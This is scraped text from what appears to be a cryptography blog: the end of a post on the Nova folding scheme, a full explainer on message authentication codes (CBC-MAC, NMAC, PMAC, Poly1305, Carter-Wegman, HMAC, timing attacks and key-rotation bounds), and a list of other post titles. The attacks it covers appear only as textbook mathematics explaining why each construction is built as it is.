where we sum over all values of \( y \) in \( {0,1}^s \). We only need to check whether the following identity holds for a randomly sampled \( \tau \)

\[ \sum_x g(\tau,x)F(x)=0 \]

for \( x \) in \( {0,1}^s \), with \( g(x,y)=1 \) for \( x=y \) and zero otherwise. We can check that equality by applying the sum-check protocol to the polynomial \( p(t)=g(\tau,t)F(t) \)</p>
Advantages</h2>
    * The verifier circuit is lightweight, with little more than 20,000 constraints.</span></span>
    * It does not need to perform FFT, so no special elliptic curves are required. The only condition is that it is sufficiently secure (that is, the discrete log problem must be hard).</span></span>
    * The verification is not based on elliptic curve pairings, so expensive operations and pairing-friendly curves are unnecessary.</span></span></code></pre>Summary</h2>
Nova is a new protocol for realizing incrementally verifiable computation based on a new cryptographic primitive called a folding scheme. The key idea is to merge two instances of a given NP statement into a single one. To be able to do so, we have to make changes to the R1CS to include an error term \( E \) and a scalar \( u \) to obtain a relaxed R1CS, over which we can build an efficient folding scheme. We also need additively-homomorphic polynomial commitment schemes, such as Pedersen commitments. The resulting construction has a small verifier circuit (around 20,000 constraints in R1CS), obtaining fast proof generation and verification. This has many applications to public ledgers, verifiable delay functions, and proof aggregation.</p>


Message Authentication Codes
Unknown — Wed, 18 Jan 2023 00:00:00 +0000
Introduction</h2>
We discussed previously</a> how to ensure message confidentiality between two parties, Alice and Bob. We saw that we could use a symmetric key cipher, such as AES or ChaCha20, to encrypt messages between Alice and Bob so that only they can read them. However, when Bob gets a message from Alice, how does he know that it is truly from Alice, nor that a malicious party has not changed it? Here is where authenticity comes into play. For example, a man-in-the-middle (MIM) can try to impersonate Alice and Bob during a key exchange in a Diffie-Hellman protocol. The scheme works as follows:</p>
    1. Alice chooses a random number \\( a \\) and computes \\( g^a \\) and sends it.</span></span>
    2. The MIM gets \\( g^a \\), chooses \\( a^\prime \\) and sends Bob \\( g^{ a^\prime } \\).</span></span>
    3. Bob chooses a random number \\( b \\) and computes \\( g^b \\) and sends it.</span></span>
    4. The MIM gets \\( g^b \\), chooses \\( b^\prime \\) and sends Bob \\( g^{ b^\prime } \\).</span></span>
    5. Alice gets the shared secret \\( g^{ ab^\prime } \\), and Bob gets \\( g^{ a^\prime b } \\); their messages get decrypted by the MIM, who can read them and then re-encrypt them to Alice or Bob with the corresponding secret key.</span></span></code></pre>
Authenticity is also crucial in contexts where confidentiality is not needed. For example, we could have an authentication tag that gives proof of the integrity of files on our hard drive. If an attacker gets access to our hard drive, he may try to change files in our operating system. The authentication tags would tell us if there has been a modification in our files or not.</p>
A message authentication code (MAC) is a primitive which allows us to ensure the integrity of a given message. Several constructions can be used, depending on the context. Two commonly used constructions are CBC-MAC and HMAC. MACs play an essential role in internet protocol security (IPsec), secure shell (ssh), and transport layer security (TLS), generating authentication codes for each packet that is transmitted.</p>
We will discuss later how to combine authentication codes with encryption to obtain authenticated encryption, which can guarantee semantic security (that is, the attacker cannot learn anything from a given ciphertext) and ciphertext integrity, leading to secure encryption against tampering.</p>
What is a MAC?</h2>
A message authentication code is a pair of efficient algorithms, signing, and verification, \( S, V \), which work over a set of messages and tags and take keys. The key space is given by an n-bit string \( {0,1 }^n \). If we know the key, we can add authentication tags and verify them. The signing algorithm takes a message \( m \) and the key \( k \) and outputs a tag \( t \):

\[ S(k,m)=t \]

The verification algorithm gets a tag, \( t \), the key \( k \), and the message \( m \) and outputs a boolean variable \( b \), which tells us whether the tag corresponds to the given message:

\[ V(k,t,m)=b \]

The MAC construction has to be secure to be helpful; otherwise, an attacker could forge messages. We say that an attacker has produced a forgery if he can find a valid pair \( m,t \) without knowing the key.</p>
Attacks against MAC</h2>
To see whether a MAC is secure, we need to establish the powers of the attacker and what would be a successful attack.</p>
We suppose the attacker can perform a chosen message attack (CMA). In simple words, the attacker is free to choose any messages \( m_i \) and can get access to the corresponding tag \( t_i=S(k,m_i) \) by having Alice or Bob calculate the tag. He does not have access to the key, though. While this may be seen as an awkward power (because he can get the tag of any message), this is something that could take place in the real world. The goal of the attacker is, given pairs \( (t_i,m_i) \) for \( i=1,2,…j \), to find a new valid pair \( t,m \), where \( m\neq m_i \). This pair is called an existential forgery. We will say the MAC is secure if it is existentially unforgeable under CMA.</p>
MACs could also be rendered insecure by replay attacks. In this situation, an adversary may capture a message and its tag from Alice to Bob and then use it to impersonate Alice by sending the same message To Bob sometime later. To avoid this, MACs include a message number (increased with each new message) or a time stamp, which is authenticated with the original message in the MAC.</p>
Construction of MAC by pseudo-random functions (PRF)</h2>
We saw examples of pseudo-random functions when we talked about block ciphers. We mentioned that these behave as pseudo-random permutations, where we take a message \( m \) and map it over one of all the possible output messages. For example, the AES block cipher is a function \( f:K\times \{0,1 \}^{128} \rightarrow \{0,1 \}^{128} \), taking a message of 16 bytes and outputting a random string of 16-bytes.</p>
We can construct a MAC from a given PRF, taking messages in a space \( X \) (for example, messages up to GB long), and outputting a tag in \( Y \) (for example, a 128-bit string), \( g: K\times X \rightarrow Y \) by doing

\[ t=g(k,m) \]

This MAC is secure provided that the PFR g is secure and that the output set is large enough; that is, the number of elements \( \vert Y \vert \) is greater than \( 2^{80} \).</p>
If the tag space is small, the attacker has a high probability of outputting the correct tag.</p>
Block ciphers and cryptographic hash functions behave as pseudo-random functions; therefore, their use in constructing MAC is reasonable. In the first case, we get CBC-MAC, while in the second, HMAC.</p>
CBC-MAC</h2>
We need a pseudo-random permutation (PRP) to build CBC-MAC, such as a block cipher. We can picture the MAC function as \( f:K^2\times M \rightarrow {0,1}^n\). It takes two different keys, \(k_1,k_2 \), a message and outputs a tag. In the case of using AES as PRP, \( n=128 \). Given that AES works with 16-byte words, the message is split into equal blocks of 16 bytes. We can always pad the message conveniently if it is not a multiple of 16. Let’s call \( m_0,m_1,…m_N \) the blocks composing the message and \( E(k,m)=C \) the AES encryption function, where the first argument is the key and the second is the message block. The algorithm proceeds as follows:</p>
    1. Compute \\( t_1 = E( k_1 , m_0 )\\).</span></span>
    2. For \\( j = 2, ... ,N \\) do  </span></span></code></pre>
\( t_{ j-1 }^\prime = t_{ j-1 }\oplus m_j \)

\( t_j = E(k_1 , t_{ j-1 }^\prime)\)
3. Compute \( t = E(k_2 , t_N) \)</p>
This last step is critical to make the MAC secure against existential forgery. If step 3 were omitted, then we can perform the following chosen message attack:</p>
    * Choose \\( m \\)</span></span>
    * Request \\( t = E(k,m) \\)</span></span>
    * Obtain the tag for the forged message \\( m,t\oplus m \\).</span></span></code></pre>
We can see that we have obtained a valid pair by performing the calculations:

\( f(k,m\vert \vert t\oplus m)=E(k,E(k,m)\oplus t\oplus m)=E(k,t\oplus t\oplus m)=E(k,m)=t \)

where we have used the fact that \( a\oplus a\oplus b=b\) (XORing \(b \) twice with the same bitstring returns \( b \)).</p>
NMAC</h2>
The NMAC construction is based on the cascade diagram. In this case, the NMAC function is \( g:K^2\times M\rightarrow K \). As in CBC-MAC, we split the message in \( N+1 \) equal blocks, \( m_0 , m_1 , … m_N \). To obtain the tag,</p>
    1. Set \\( t_0 = k_1 \\).</span></span>
    2. For \\(i = 1,...N \\) perform \\( F(t_{i-1} , m_{i-1}) = t_i\\)</span></span>
    3. Pad \\( t_N \\) with a fix pad element \\( \mathrm{fpad} \\) so that its length corresponds to the size of the elements in \\( M \\), \\( t_{N+1} \\).</span></span>
    4. Compute \\( t=F(k_2 , t_{N+1}) \\)</span></span></code></pre>
Step 2 corresponds to the cascade. Step 4 is necessary once again to prevent a length extension attack. We can see that if we know the result of the cascade \( \mathrm{cascade}(k,m)\), then we can append any string \( w \) and obtain the exit of the cascade \( \mathrm{cascade}(k,m\vert \vert w)\).</p>
Even though we could use NMAC with AES, this proves inconvenient in practice since there is a rapid change in the key scheduling. The strategy works best with cryptographic hash functions.</p>
PMAC</h2>
The problem with the NMAC and CBC-MAC is that they are carried out sequentially. This can be inconvenient in the case of very long messages since we cannot leverage multiple processors to accelerate the calculation. Parallel MAC solves this problem by adopting a different scheme. To build PMAC, we need two functions: a pseudo-random function \( F:K\times M\rightarrow M \) and a function taking a key and a counter \( P:K\times \mathbb{Z_0 }^+ \rightarrow K \). To compute the tag:</p>
    1. For \\( i = 0, 1 ,...N \\) compute \\( {m_i}^\prime = m_i \oplus P(k_1 ,i)\\) and \\( t_i = F(k_2 , {m_i}^\prime) \\).</span></span>
    2. Compute \\( m^\prime = m_0^\prime \oplus m_1^\prime\oplus ...\oplus m_N^\prime \\).</span></span>
    3. Obtain \\( t = F(k_2 , m^\prime) \\).</span></span></code></pre>Universal hashing and One-time MAC</h2>
A faster version than PFR function-based MACs is the one-time MAC; this can be secure against all adversaries. They are based on universal hash functions, which are weaker than cryptographic hash functions (they do not need to be collision-resistant) but operate much faster. A universal hash function (UHF) takes a key, \( k \), and a message, \( m \), and gives the hash \( h_m = UHF(k,m) \). The only security requirement is that for any two messages \( m_1 , m_2 \), the probability that they hash to the same value for a random key is negligible:

\[Pr(UHF(k,m_1) = UHF(k,m_2), k\leftarrow K) = \mathrm{neg}\ \forall m_1,m_2 \]</p>
First, we break the message into \( N \) blocks as before. Then, we interpret each of these blocks as a number over a large finite field (that is, every block is an element from \( {0,1,2,..,q-1} \)). We can take each of them as the coefficient of a polynomial. To build the MAC, we fix a large prime \( q \) and take two random integers \( a,b \) in \( {1,2,…q-1}\). The signing algorithm is

\[ S(a,b,m) = a^{N+1} + m_{N} a^N + m_{N-1} a^{N-1} + … a_1 m_1 + b \mod{q} \]

The algorithm evaluates the polynomial with coefficients given by \( m_i \) at point \( a \), adds \( b \), and reduces the result modulo \( q \) so that the tag is also an element in the finite field \( \mathbb{F}_q \).</p>
Poly1305 is an example of such a construction and is used in combination with AES or ChaCha20 (we will soon see why we need to combine them) to provide a fast MAC, used, for example, by Google, to secure HTTPS connections. In particular, Poly1305 breaks the messages into blocks of 16 bytes, interpreting each as a 129-bit number in little-endian form by appending an additional bit to each block. The modulus is \(q = 2^{130}-5 \), and the final result is reduced by taking the remainder by \( 2^{128} \).</p>
The problem with one-time MACs is that we can authenticate only one message. An attacker can easily break the scheme to obtain both \( a \) and \( b \). Note that if the attacker submits a message where each \( m_i=0 \), then \( S(a,b,m)=b \). Then, he can send the message \( m_1=1,m_i=0\ \forall \ i>1 \) and get \( S(a,b,m)=b+a \mod{q} \) and recover \( a \). We can solve this problem by improving the construction and incorporating a pseudo-random function.</p>
Carter-Wegman MAC</h2>
The Carter-Wegman MAC combines a PRF with a one-time MAC. If \( F:K_F\times {0,1}^n \rightarrow {0,1}^n\) is the pseudo-random function and \( S(k_S,m) \) is a secure one-time MAC, the Carter-Wegman MAC is calculated as follows: Pick at random \( r \) in \( {0,1}^n \) and calculate

\[ CW(k_F,k_S,m)=(r,F(k_F,r)\oplus S(k_S,m)) \]

The input to the pseudo-random function is small, and even though \( F \) can be slower than \( S \), it will be computed very fast. We leave the message to the one-time MAC, which can deal efficiently even with large messages.</p>
HMAC</h2>
To construct HMAC we need a key, \( k \), inner and outer paddings, \( \mathrm{ipad,opad} \) and a secure cryptographic hash function \( H:{0,1}^\star\rightarrow {0,1}^n \). The signing algorithm is

\[ S(k,m)=H(k\oplus \mathrm{opad},H(k\oplus \mathrm{ipad},m)) \]

The pseudo-random function masks the only weakness of the UHF by XORing the result of the UHF with a strongly random output from the PFR.</p>
Timing attacks on tag verification</h2>
MAC verification can be subject to bugs or attacks if not done correctly. One standard attack against poorly implemented MAC verification schemes is timing attacks. In the verification, the verifier takes the key, \( k \), and the message \( m \), computes the authentication tag \( t^\prime \), and compares the received tag \( t \). One naïve way to do this is by performing a byte by byte comparison,

\[ t^\prime[i] == t[i]\]

The problem with checking this way is that, as soon as two bytes differ, for example, byte number 3, an attacker can be sure that the first two bytes are correct. The attacker can try different values for the third byte and measure the time it takes to verify. If it increases, he knows he got right at least another byte. The process can continue until he exhausts the number of bytes in the tag, getting the valid tag \( t \) for a message \( m \), being able to produce an existential forgery. Therefore, the lesson is to ensure the verification is performed in constant time so that no information is leaked from the tag.</p>
Need to change the key</h2>
To be secure, the MAC needs to be long enough. If not, they could be subjected to brute force attacks. We can find bounds for the number of messages we can MAC before changing keys. For example, in CBC-MAC, which outputs tags in \( \{0,1 \}^n \), if the adversary can query \( q \) messages of length \( \ell \), then we need that

\[ \frac{q^2 \ell^2 }{ 2^n } \ll 1\]

This means that \( q\ell \ll 2^n \). If we use AES where \( n=128 \) and we consider that \( 2^{-32}\approx 2\times 10^{-10}\) to be sufficiently small, then \( q\ell \leq 2^{48} \). Given that 1 GB of data is \( 2^{30} \) bytes, we can encrypt several messages containing up to several GB before changing the key.</p>
In the case of HMAC with SHA-256, we have \( n=256 \), and the amount of messages we can tag before reaching the limit is \( q \ll 2^{256/2} \), which, for our case, could be something like \( 2^{100}\approx 10^{30} \)</p>
Summary</h2>
Encryption schemes, such as AES or ChaCha20, offer confidentiality but cannot ensure the authenticity of messages nor that an attacker has not modified them. The lack of authenticity can lead to devastating attacks and break cryptographic schemes. Message authentication codes (MAC) provide ways to ensure the integrity of the message, which we can combine with encryption schemes to provide authenticated encryption. To be secure, MACs need to satisfy existential unforgeability under chosen message attacks; given a new message \( m \), an attacker should not be able to generate a valid authentication tag \( t \), even if he has access to other valid pairs \( m_i,t_i \). MAC can be obtained from pseudo-random functions (such as hash functions or block ciphers, like AES) or universal hash functions, each offering advantages and disadvantages in terms of speed, size, processing in parallel, etc.</p>
LambdaClass Blog

A Sharper Look at FRI

Ethereum is the new financial backend of the world

The missing institution of the Internet: Ethereum

Speeding up sumcheck for Ethereum's Lean zkVM: an in-depth walkthrough of our implementation

The Cost Problem</h3> The naive (or classical) sumcheck prover (Algorithm 1</em> in the paper) suffers from premature extension field propagation:</p>

Efficient attention explained: the math behind linear-time transformers

How factoring equality polynomials optimizes sumcheck

Whirlaway: Multilinear STARKs using WHIR as polynomial commitment scheme

WHIR Protocol</h2>

Next steps</h2> In upcoming posts, we will be covering several aspects related to the security of WHIR, its use as a proving backend for efficient post-quantum secure signature aggregation and possible improvements to reduce proof size and proving time.</p>

Optimizing Sumcheck

Multilinear polynomials: survival kit

GKR protocol implementation: deep dive into the code

Circuit Gates</h3> Each gate in the circuit is either an addition (Add</code>) or multiplication (Mul</code>) gate. The gate type determines how the outputs from the previous layer are combined:</p>

Circuit Automatic Validation</h3> When you construct a Circuit</code>, several checks are performed automatically to ensure the circuit is well-formed:</p>

Prover</h3>

The proof structure</h4> The prover is responsible for evaluating the circuit and constructing a proof that convinces the verifier of the correctness of this evaluation. The core logic for the prover resides in prover.rs</code>, where you can find the struct GKRProof</code> that consists of:</p>

BitVM: enabling efficient verifiable computation in Bitcoin

Next steps</h2>
In upcoming posts, we will be covering several aspects related to the security of WHIR, its use as a proving backend for efficient post-quantum secure signature aggregation and possible improvements to reduce proof size and proving time.</p>